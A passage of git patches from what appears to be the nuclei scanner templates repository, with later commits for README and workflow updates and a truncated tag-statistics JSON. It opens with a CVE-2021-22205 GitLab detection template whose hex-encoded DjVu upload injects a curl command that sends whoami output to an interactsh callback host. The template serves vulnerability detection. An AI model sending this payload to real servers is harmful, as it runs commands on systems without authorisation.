{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - 'Failed to process image' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: status + status: + - 422 + + extractors: + - type: regex + name: csrf-token + internal: true + group: 1 + regex: + - 'csrf-token" content="(.*?)" />\n\n<meta' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com' \ No newline at end of file From afbd9684af7e139ed3dfc51b835b1a653701d7ea Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 12:31:36 +0000 Subject: [PATCH 114/145] Auto README Update [Wed Oct 27 12:31:36 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 75ccce2154..1466ea7643 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2454 files**. +**178 directories, 2458 files**. </td> </tr> From 2d19236680fcf292c43734d6d524464396d294ae Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:21:06 +0530 Subject: [PATCH 115/145] misc update --- cves/2021/CVE-2021-22205.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml index d70718eb42..ba3b336ab1 100644 --- a/cves/2021/CVE-2021-22205.yaml +++ b/cves/2021/CVE-2021-22205.yaml @@ -56,6 +56,7 @@ requests: - 'csrf-token" content="(.*?)" />\n\n<meta' - type: regex + name: whoami part: interactsh_request group: 1 regex: From 0462988ca237360eb507da7c219fb1e54b9d7301 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:19:45 +0000 Subject: [PATCH 116/145] Auto README Update [Wed Oct 27 13:19:45 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1466ea7643..c5a55a6c3c 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**178 directories, 2458 files**. +**178 directories, 2459 files**. </td> </tr> From 7ea69a963f2ae9eb6ff0a704b63024ce5603e968 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:54:12 +0530 Subject: [PATCH 117/145] workflow fix --- .github/workflows/templates-stats.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 6132ebfa0b..ae4e49a7b8 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,13 +1,11 @@ name: 🗒 Templates Stats on: - create: workflow_dispatch: jobs: build: runs-on: ubuntu-latest - if: ${{ startsWith(github.ref, 'refs/tags/v') }} steps: - uses: actions/checkout@master - uses: actions/setup-go@v2 From 9295b44c7946f9713e12640b1846f854b5e09720 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:25:05 +0000 Subject: [PATCH 118/145] Auto Generated Templates Stats [Wed Oct 27 13:25:05 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1860 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 958 insertions(+), 924 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 2041694d06..37d4d126a4 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":838},{"name":"lfi","count":344},{"name":"panel","count":284},{"name":"xss","count":259},{"name":"wordpress","count":255},{"name":"exposure","count":245},{"name":"rce","count":215},{"name":"tech","count":196},{"name":"wp-plugin","count":178},{"name":"cve2020","count":166},{"name":"cve2021","count":157},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":98},{"name":"cve2018","count":92},{"name":"iot","count":79},{"name":"apache","count":73},{"name":"oast","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":44},{"name":"ssrf","count":42},{"name":"sqli","count":40},{"name":"","count":39},{"name":"cve2016","count":38},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"cve2015","count":29},{"name":"jira","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"auth-bypass","count":24},{"name":"generic","count":24},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"misconfig","count":23},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"php","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":15},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"deserialization","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"magento","count":11},{"name":"xxe","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"fastjson","count":8},{"name":"backup","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"nginx","count":8},{"name":"gitlab","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"phpmyadmin","count":6},{"name":"camera","count":6},{"name":"jetty","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"fileupload","count":6},{"name":"nodejs","count":6},{"name":"prometheus","count":6},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"wso2","count":5},{"name":"crlf","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"printer","count":5},{"name":"symfony","count":5},{"name":"tomcat","count":5},{"name":"jolokia","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"artifactory","count":4},{"name":"fatpipe","count":4},{"name":"proxy","count":4},{"name":"zimbra","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"rfi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"microstrategy","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"firebase","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"webserver","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"thinkcmf","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"strapi","count":4},{"name":"firmware","count":4},{"name":"symantec","count":4},{"name":"npm","count":4},{"name":"glpi","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"solarwinds","count":4},{"name":"zabbix","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"tikiwiki","count":3},{"name":"httpd","count":3},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"telerik","count":3},{"name":"openam","count":3},{"name":"lfr","count":3},{"name":"cacti","count":3},{"name":"jeesns","count":3},{"name":"bigip","count":3},{"name":"minio","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"exposures","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"openssh","count":3},{"name":"node","count":3},{"name":"springcloud","count":3},{"name":"druid","count":3},{"name":"github","count":3},{"name":"backdoor","count":3},{"name":"kafka","count":3},{"name":"caucho","count":3},{"name":"opensis","count":3},{"name":"ssh","count":3},{"name":"sonicwall","count":3},{"name":"log","count":3},{"name":"jellyfin","count":3},{"name":"itop","count":3},{"name":"kevinlab","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"cves","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"linkerd","count":3},{"name":"bitrix","count":3},{"name":"cloud","count":3},{"name":"mail","count":3},{"name":"mongodb","count":3},{"name":"smtp","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"hoteldruid","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"kibana","count":3},{"name":"targa","count":3},{"name":"terramaster","count":3},{"name":"injection","count":3},{"name":"hasura","count":2},{"name":"commax","count":2},{"name":"horde","count":2},{"name":"dolibarr","count":2},{"name":"spark","count":2},{"name":"waf","count":2},{"name":"text","count":2},{"name":"nextcloud","count":2},{"name":"openvpn","count":2},{"name":"pega","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"harbor","count":2},{"name":"bucket","count":2},{"name":"aviatrix","count":2},{"name":"axis","count":2},{"name":"akamai","count":2},{"name":"ilo","count":2},{"name":"jsf","count":2},{"name":"dos","count":2},{"name":"phpcollab","count":2},{"name":"places","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"ecoa","count":2},{"name":"s3","count":2},{"name":"nagios","count":2},{"name":"linux","count":2},{"name":"wuzhicms","count":2},{"name":"voipmonitor","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"kentico","count":2},{"name":"jboss","count":2},{"name":"enumeration","count":2},{"name":"odoo","count":2},{"name":"electron","count":2},{"name":"smb","count":2},{"name":"ucmdb","count":2},{"name":"vcenter","count":2},{"name":"grav","count":2},{"name":"bruteforce","count":2},{"name":"xxljob","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"hjtcloud","count":2},{"name":"lotus","count":2},{"name":"payara","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"status","count":2},{"name":"huawei","count":2},{"name":"getsimple","count":2},{"name":"mailchimp","count":2},{"name":"aspose","count":2},{"name":"akkadian","count":2},{"name":"justwriting","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"rancher","count":2},{"name":"totemomail","count":2},{"name":"geowebserver","count":2},{"name":"cve2005","count":2},{"name":"sitecore","count":2},{"name":"mcafee","count":2},{"name":"nextjs","count":2},{"name":"backups","count":2},{"name":"chamilo","count":2},{"name":"prestashop","count":2},{"name":"icewarp","count":2},{"name":"flir","count":2},{"name":"bitly","count":2},{"name":"qihang","count":2},{"name":"trixbox","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"avantfax","count":2},{"name":"ec2","count":2},{"name":"hashicorp","count":2},{"name":"aruba","count":2},{"name":"splunk","count":2},{"name":"showdoc","count":2},{"name":"bypass","count":2},{"name":"paloalto","count":2},{"name":"netis","count":2},{"name":"natshell","count":2},{"name":"glassfish","count":2},{"name":"guacamole","count":2},{"name":"sharepoint","count":2},{"name":"cache","count":2},{"name":"heroku","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"adminer","count":2},{"name":"chiyu","count":2},{"name":"axis2","count":2},{"name":"sonarqube","count":2},{"name":"kong","count":2},{"name":"emerge","count":2},{"name":"tidb","count":2},{"name":"upload","count":2},{"name":"oauth","count":2},{"name":"db","count":2},{"name":"favicon","count":2},{"name":"liferay","count":2},{"name":"saltstack","count":2},{"name":"chyrp","count":2},{"name":"middleware","count":2},{"name":"frp","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"yapi","count":2},{"name":"storage","count":2},{"name":"idrac","count":2},{"name":"monitorix","count":1},{"name":"moinmoin","count":1},{"name":"maccmsv10","count":1},{"name":"sgp","count":1},{"name":"buttercms","count":1},{"name":"twitter","count":1},{"name":"ghost","count":1},{"name":"monitorr","count":1},{"name":"burp","count":1},{"name":"viewlinc","count":1},{"name":"webmodule-ee","count":1},{"name":"scs","count":1},{"name":"accela","count":1},{"name":"labtech","count":1},{"name":"tracer","count":1},{"name":"crm","count":1},{"name":"zookeeper","count":1},{"name":"asus","count":1},{"name":"woocomernce","count":1},{"name":"zeroshell","count":1},{"name":"nifi","count":1},{"name":"influxdb","count":1},{"name":"upnp","count":1},{"name":"zarafa","count":1},{"name":"zend","count":1},{"name":"instagram","count":1},{"name":"robomongo","count":1},{"name":"yachtcontrol","count":1},{"name":"sophos","count":1},{"name":"qdpm","count":1},{"name":"emby","count":1},{"name":"huijietong","count":1},{"name":"springframework","count":1},{"name":"xml","count":1},{"name":"route","count":1},{"name":"fcm","count":1},{"name":"ricoh","count":1},{"name":"adiscon","count":1},{"name":"mantisbt","count":1},{"name":"cyberoam","count":1},{"name":"ipstack","count":1},{"name":"myucms","count":1},{"name":"emc","count":1},{"name":"ambari","count":1},{"name":"octobercms","count":1},{"name":"tjws","count":1},{"name":"contentkeeper","count":1},{"name":"spring","count":1},{"name":"servicenow","count":1},{"name":"expn","count":1},{"name":"opentsdb","count":1},{"name":"mongo","count":1},{"name":"linkedin","count":1},{"name":"totaljs","count":1},{"name":"olivetti","count":1},{"name":"basic-auth","count":1},{"name":"tenda","count":1},{"name":"tcexam","count":1},{"name":"xunchi","count":1},{"name":"erp-nc","count":1},{"name":"powercreator","count":1},{"name":"esmtp","count":1},{"name":"mantis","count":1},{"name":"servicedesk","count":1},{"name":"nps","count":1},{"name":"phalcon","count":1},{"name":"lutron","count":1},{"name":"jenzabar","count":1},{"name":"javascript","count":1},{"name":"listserv","count":1},{"name":"sarg","count":1},{"name":"avtech","count":1},{"name":"blackboard","count":1},{"name":"mapbox","count":1},{"name":"bolt","count":1},{"name":"exponentcms","count":1},{"name":"skycaiji","count":1},{"name":"bazarr","count":1},{"name":"database","count":1},{"name":"jsp","count":1},{"name":"nedi","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"etouch","count":1},{"name":"opm","count":1},{"name":"landray","count":1},{"name":"circle","count":1},{"name":"traefik","count":1},{"name":"clickhouse","count":1},{"name":"tectuus","count":1},{"name":"razor","count":1},{"name":"jenkin","count":1},{"name":"74cms","count":1},{"name":"argussurveillance","count":1},{"name":"minimouse","count":1},{"name":"realteo","count":1},{"name":"pihole","count":1},{"name":"nerdgraph","count":1},{"name":"nearby","count":1},{"name":"beanshell","count":1},{"name":"synnefo","count":1},{"name":"concrete","count":1},{"name":"rubedo","count":1},{"name":"bullwark","count":1},{"name":"openweather","count":1},{"name":"webui","count":1},{"name":"javafaces","count":1},{"name":"mediumish","count":1},{"name":"clockwork","count":1},{"name":"mirai","count":1},{"name":"cherokee","count":1},{"name":"rockethchat","count":1},{"name":"weglot","count":1},{"name":"memcached","count":1},{"name":"elfinder","count":1},{"name":"autocomplete","count":1},{"name":"smi","count":1},{"name":"jfrog","count":1},{"name":"oidc","count":1},{"name":"pagerduty","count":1},{"name":"avalanche","count":1},{"name":"uwsgi","count":1},{"name":"buildkite","count":1},{"name":"biometrics","count":1},{"name":"gloo","count":1},{"name":"tinypng","count":1},{"name":"jaspersoft","count":1},{"name":"qsan","count":1},{"name":"centreon","count":1},{"name":"expose","count":1},{"name":"sceditor","count":1},{"name":"ems","count":1},{"name":"jnoj","count":1},{"name":"weather","count":1},{"name":"plugin","count":1},{"name":"xmlchart","count":1},{"name":"opensmtpd","count":1},{"name":"xiuno","count":1},{"name":"wamp","count":1},{"name":"miscrsoft","count":1},{"name":"seacms","count":1},{"name":"bookstack","count":1},{"name":"ganglia","count":1},{"name":"domxss","count":1},{"name":"hadoop","count":1},{"name":"mdb","count":1},{"name":"spip","count":1},{"name":"blind","count":1},{"name":"geutebruck","count":1},{"name":"wavemaker","count":1},{"name":"loqate","count":1},{"name":"achecker","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bingmaps","count":1},{"name":"wildfly","count":1},{"name":"ns","count":1},{"name":"photo","count":1},{"name":"hortonworks","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"kubeflow","count":1},{"name":"apiman","count":1},{"name":"secmail","count":1},{"name":"discourse","count":1},{"name":"elascticsearch","count":1},{"name":"werkzeug","count":1},{"name":"pyramid","count":1},{"name":"addpac","count":1},{"name":"iceflow","count":1},{"name":"roads","count":1},{"name":"dnssec","count":1},{"name":"tika","count":1},{"name":"jeewms","count":1},{"name":"phpshowtime","count":1},{"name":"streetview","count":1},{"name":"stripe","count":1},{"name":"froxlor","count":1},{"name":"sqlite","count":1},{"name":"tugboat","count":1},{"name":"playable","count":1},{"name":"websphere","count":1},{"name":"mod-proxy","count":1},{"name":"directions","count":1},{"name":"jquery","count":1},{"name":"klog","count":1},{"name":"gespage","count":1},{"name":"javamelody","count":1},{"name":"chinaunicom","count":1},{"name":"circontrorl","count":1},{"name":"zcms","count":1},{"name":"shiro","count":1},{"name":"kafdrop","count":1},{"name":"phpfastcache","count":1},{"name":"ewebs","count":1},{"name":"craftcms","count":1},{"name":"cockpit","count":1},{"name":"whm","count":1},{"name":"flexbe","count":1},{"name":"parentlink","count":1},{"name":"elasticsearch","count":1},{"name":"geocode","count":1},{"name":"elevation","count":1},{"name":"cobub","count":1},{"name":"wakatime","count":1},{"name":"artica","count":1},{"name":"xmpp","count":1},{"name":"couchbase","count":1},{"name":"checkpoint","count":1},{"name":"xvr","count":1},{"name":"openx","count":1},{"name":"rsyncd","count":1},{"name":"phpunit","count":1},{"name":"wmt","count":1},{"name":"appweb","count":1},{"name":"zm","count":1},{"name":"cloudinary","count":1},{"name":"b2evolution","count":1},{"name":"luftguitar","count":1},{"name":"sar2html","count":1},{"name":"clusterengine","count":1},{"name":"turbocrm","count":1},{"name":"fortigates","count":1},{"name":"triconsole","count":1},{"name":"sprintful","count":1},{"name":"ecom","count":1},{"name":"redwood","count":1},{"name":"eyelock","count":1},{"name":"tor","count":1},{"name":"visualstudio","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"fiori","count":1},{"name":"clave","count":1},{"name":"ulterius","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"gitlist","count":1},{"name":"cocoon","count":1},{"name":"bedita","count":1},{"name":"bing","count":1},{"name":"interlib","count":1},{"name":"dom","count":1},{"name":"ognl","count":1},{"name":"kindeditor","count":1},{"name":"beanstalk","count":1},{"name":"dbeaver","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"details","count":1},{"name":"krweb","count":1},{"name":"travis","count":1},{"name":"asana","count":1},{"name":"owa","count":1},{"name":"gridx","count":1},{"name":"testrail","count":1},{"name":"alerta","count":1},{"name":"redcap","count":1},{"name":"panabit","count":1},{"name":"netrc","count":1},{"name":"feifeicms","count":1},{"name":"clockwatch","count":1},{"name":"wondercms","count":1},{"name":"opensns","count":1},{"name":"starttls","count":1},{"name":"dotnet","count":1},{"name":"mkdocs","count":1},{"name":"rabbitmq","count":1},{"name":"myvuehelp","count":1},{"name":"sql","count":1},{"name":"iterable","count":1},{"name":"newrelic","count":1},{"name":"plastic","count":1},{"name":"diris","count":1},{"name":"square","count":1},{"name":"acexy","count":1},{"name":"k8","count":1},{"name":"salesforce","count":1},{"name":"find","count":1},{"name":"alibaba","count":1},{"name":"shoppable","count":1},{"name":"ruckus","count":1},{"name":"cgi","count":1},{"name":"lokalise","count":1},{"name":"imap","count":1},{"name":"webftp","count":1},{"name":"dvr","count":1},{"name":"shopware","count":1},{"name":"ssltls","count":1},{"name":"dotclear","count":1},{"name":"axiom","count":1},{"name":"bash","count":1},{"name":"novnc","count":1},{"name":"manager","count":1},{"name":"nsasg","count":1},{"name":"raspap","count":1},{"name":"sourcebans","count":1},{"name":"blue-ocean","count":1},{"name":"flink","count":1},{"name":"nc2","count":1},{"name":"glances","count":1},{"name":"htmli","count":1},{"name":"svnserve","count":1},{"name":"cloudflare","count":1},{"name":"auth","count":1},{"name":"eg","count":1},{"name":"k8s","count":1},{"name":"tamronos","count":1},{"name":"solman","count":1},{"name":"netmask","count":1},{"name":"primetek","count":1},{"name":"cves2001","count":1},{"name":"pgadmin","count":1},{"name":"simplecrm","count":1},{"name":"vsphere","count":1},{"name":"speed","count":1},{"name":"redis","count":1},{"name":"adb","count":1},{"name":"twitter-server","count":1},{"name":"socomec","count":1},{"name":"pacsone","count":1},{"name":"oscommerce","count":1},{"name":"gilacms","count":1},{"name":"shoretel","count":1},{"name":"visualtools","count":1},{"name":"gstorage","count":1},{"name":"rdp","count":1},{"name":"mongoshake","count":1},{"name":"jitsi","count":1},{"name":"ntopng","count":1},{"name":"pcoip","count":1},{"name":"openerp","count":1},{"name":"ueditor","count":1},{"name":"terraform","count":1},{"name":"nette","count":1},{"name":"magicflow","count":1},{"name":"lg-nas","count":1},{"name":"karel","count":1},{"name":"shopxo","count":1},{"name":"wavlink","count":1},{"name":"xampp","count":1},{"name":"wiki","count":1},{"name":"clink-office","count":1},{"name":"opencast","count":1},{"name":"gotmls","count":1},{"name":"rmi","count":1},{"name":"nuxeo","count":1},{"name":"keenetic","count":1},{"name":"commscope","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"floc","count":1},{"name":"sidekiq","count":1},{"name":"shopizer","count":1},{"name":"grails","count":1},{"name":"meraki","count":1},{"name":"syslog","count":1},{"name":"sco","count":1},{"name":"dotnetnuke","count":1},{"name":"resourcespace","count":1},{"name":"vnc","count":1},{"name":"sangfor","count":1},{"name":"majordomo2","count":1},{"name":"cors","count":1},{"name":"setup","count":1},{"name":"metabase","count":1},{"name":"proftpd","count":1},{"name":"trilithic","count":1},{"name":"email","count":1},{"name":"key","count":1},{"name":"cscart","count":1},{"name":"default","count":1},{"name":"sureline","count":1},{"name":"aura","count":1},{"name":"tpshop","count":1},{"name":"centos","count":1},{"name":"mailgun","count":1},{"name":"visionhub","count":1},{"name":"openstack","count":1},{"name":"faraday","count":1},{"name":"cerebro","count":1},{"name":"pendo","count":1},{"name":"chevereto","count":1},{"name":"rujjie","count":1},{"name":"zmanda","count":1},{"name":"tieline","count":1},{"name":"smartblog","count":1},{"name":"remkon","count":1},{"name":"csrfguard","count":1},{"name":"subrion","count":1},{"name":"woocommerce","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"optiLink","count":1},{"name":"jabber","count":1},{"name":"graphql","count":1},{"name":"tapestry","count":1},{"name":"spf","count":1},{"name":"fastapi","count":1},{"name":"hiawatha","count":1},{"name":"stem","count":1},{"name":"zyxel","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"loganalyzer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"redmine","count":1},{"name":"finereport","count":1},{"name":"sage","count":1},{"name":"wifisky","count":1},{"name":"nomad","count":1},{"name":"circontrol","count":1},{"name":"szhe","count":1},{"name":"tongda","count":1},{"name":"gsoap","count":1},{"name":"fuelcms","count":1},{"name":"spidercontrol","count":1},{"name":"phpinfo","count":1},{"name":"frontpage","count":1},{"name":"camunda","count":1},{"name":"mobileiron","count":1},{"name":"api-manager","count":1},{"name":"matrix","count":1},{"name":"wing-ftp","count":1},{"name":"place","count":1},{"name":"selea","count":1},{"name":"wazuh","count":1},{"name":"mpsec","count":1},{"name":"youtube","count":1},{"name":"actuator","count":1},{"name":"cloudron","count":1},{"name":"lotuscms","count":1},{"name":"mrtg","count":1},{"name":"package","count":1},{"name":"sonarcloud","count":1},{"name":"oneblog","count":1},{"name":"graylog","count":1},{"name":"h3c-imc","count":1},{"name":"qvisdvr","count":1},{"name":"websvn","count":1},{"name":"svn","count":1},{"name":"zte","count":1},{"name":"geolocation","count":1},{"name":"solarlog","count":1},{"name":"expressjs","count":1},{"name":"thinkadmin","count":1},{"name":"apos","count":1},{"name":"rocketchat","count":1},{"name":"livezilla","count":1},{"name":"timezone","count":1},{"name":"tensorboard","count":1},{"name":"zenario","count":1},{"name":"csod","count":1},{"name":"messaging","count":1},{"name":"haproxy","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"digitalocean","count":1},{"name":"hubspot","count":1},{"name":"circleci","count":1},{"name":"sentry","count":1},{"name":"fortinet","count":1},{"name":"webmin","count":1},{"name":"episerver","count":1},{"name":"spotify","count":1},{"name":"locations","count":1},{"name":"redhat","count":1},{"name":"comodo","count":1},{"name":"timeclock","count":1},{"name":"mysql","count":1},{"name":"fedora","count":1},{"name":"linksys","count":1},{"name":"acme","count":1},{"name":"gunicorn","count":1},{"name":"codeigniter","count":1},{"name":"pagespeed","count":1},{"name":"cse","count":1},{"name":"nexusdb","count":1},{"name":"varnish","count":1},{"name":"eprints","count":1},{"name":"iptime","count":1},{"name":"okta","count":1},{"name":"postmark","count":1},{"name":"owasp","count":1},{"name":"fortilogger","count":1},{"name":"jumpcloud","count":1},{"name":"postmessage","count":1},{"name":"dahua","count":1},{"name":"phpwiki","count":1},{"name":"gitea","count":1},{"name":"metinfo","count":1},{"name":"darkstat","count":1},{"name":"rhymix","count":1},{"name":"pippoint","count":1},{"name":"jmx","count":1},{"name":"fortiweb","count":1},{"name":"cofax","count":1},{"name":" default-login","count":1},{"name":"st","count":1},{"name":"yzmcms","count":1},{"name":"scimono","count":1},{"name":"okiko","count":1},{"name":"graphite","count":1},{"name":"vscode","count":1},{"name":"plone","count":1},{"name":"processmaker","count":1},{"name":"logontracer","count":1},{"name":"nuuo","count":1},{"name":"mautic","count":1},{"name":"moin","count":1},{"name":"aspnuke","count":1},{"name":"limit","count":1},{"name":"trane","count":1},{"name":"webadmin","count":1},{"name":"pmb","count":1},{"name":"postgres","count":1},{"name":"lighttpd","count":1},{"name":"kerbynet","count":1},{"name":"openrestry","count":1},{"name":"dompdf","count":1},{"name":"natemail","count":1},{"name":"timesheet","count":1},{"name":"maxsite","count":1},{"name":"tensorflow","count":1},{"name":"zms","count":1},{"name":"omi","count":1},{"name":"saltapi","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"gogs","count":1},{"name":"dropbox","count":1},{"name":"office365","count":1},{"name":"soar","count":1},{"name":"pivotaltracker","count":1},{"name":"hiboss","count":1},{"name":"landrayoa","count":1},{"name":"pulsesecure","count":1},{"name":"node-red-dashboard","count":1},{"name":"deviantart","count":1},{"name":"ioncube","count":1},{"name":"ruby","count":1},{"name":"swagger","count":1},{"name":"azkaban","count":1},{"name":"bigbluebutton","count":1},{"name":"skywalking","count":1},{"name":"announcekit","count":1},{"name":"mariadb","count":1},{"name":"netdata","count":1},{"name":"gurock","count":1},{"name":"netgenie","count":1},{"name":"panasonic","count":1},{"name":"portainer","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"cve2006","count":1},{"name":"daybyday","count":1},{"name":"nordex","count":1},{"name":"etherpad","count":1},{"name":"exacqvision","count":1},{"name":"drone","count":1},{"name":"tileserver","count":1},{"name":"nimble","count":1},{"name":"yealink","count":1},{"name":"ilo4","count":1},{"name":"xdcms","count":1},{"name":"fastcgi","count":1},{"name":"kyan","count":1},{"name":"alertmanager","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"spectracom","count":1},{"name":"smartsense","count":1},{"name":"fortigate","count":1},{"name":"gateone","count":1},{"name":"cve202","count":1},{"name":"v